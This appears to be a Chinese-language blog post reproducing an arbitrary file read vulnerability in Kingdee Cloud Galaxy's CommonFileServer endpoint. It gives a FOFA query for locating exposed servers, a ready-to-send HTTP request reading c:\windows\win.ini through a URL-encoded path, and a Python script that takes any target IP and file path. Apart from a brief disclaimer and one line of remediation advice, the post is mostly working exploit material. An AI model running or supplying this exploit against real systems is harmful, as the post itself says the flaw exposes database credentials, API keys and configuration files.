金蝶云星空 CommonFileServer 任意文件读取漏洞复现

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

一、漏洞概述

金蝶云星空V7.X、V8.X所有私有云和混合云版本存在一个通用漏洞，攻击者可利用此漏洞获取服务器上的任意文件，包括数据库凭据、API密钥、配置文件等，从而获取系统权限和敏感信息。

二、影响版本

    6.x-8.x版本

三、漏洞复现

fofa语法：app="金蝶云星空-管理中心"

poc

GET /CommonFileServer/c%3A%2Fwindows%2Fwin.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

 劫持重放

漏洞利用简单，直接在/CommonFileServer/路径后面接任意的文件名

四、EXP

 源码如下：

使用方法：直接运行，IP地址格式为127.0.0.1:8000

import requests
import urllib.parse

def poc(ip, file_path):
    # 对文件路径进行URL编码
    url_encoded_path = urllib.parse.quote(file_path)
    # 构造URL地址
    url = f'http://{ip}/CommonFileServer/{url_encoded_path}'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Connection': 'keep-alive'
    }
    try:
        response = requests.get(url=url, headers=headers, verify=False, timeout=5)
        if response.status_code == 200 and '[fonts]' in response.text:
            print(f'[+] {ip} 存在任意文件读取漏洞')

    except Exception as e:
        print(f'[-] {ip} 请求失败：{e}')
        pass

if __name__ == '__main__':
    ip = input('请输入目标主机IP地址：')
    file_path = input('请输入需要访问的文件路径：')
    poc(ip, file_path)

五、修复建议

减小互联网暴露面，设置ACL权限，安全设备

当然最重要的是打好补丁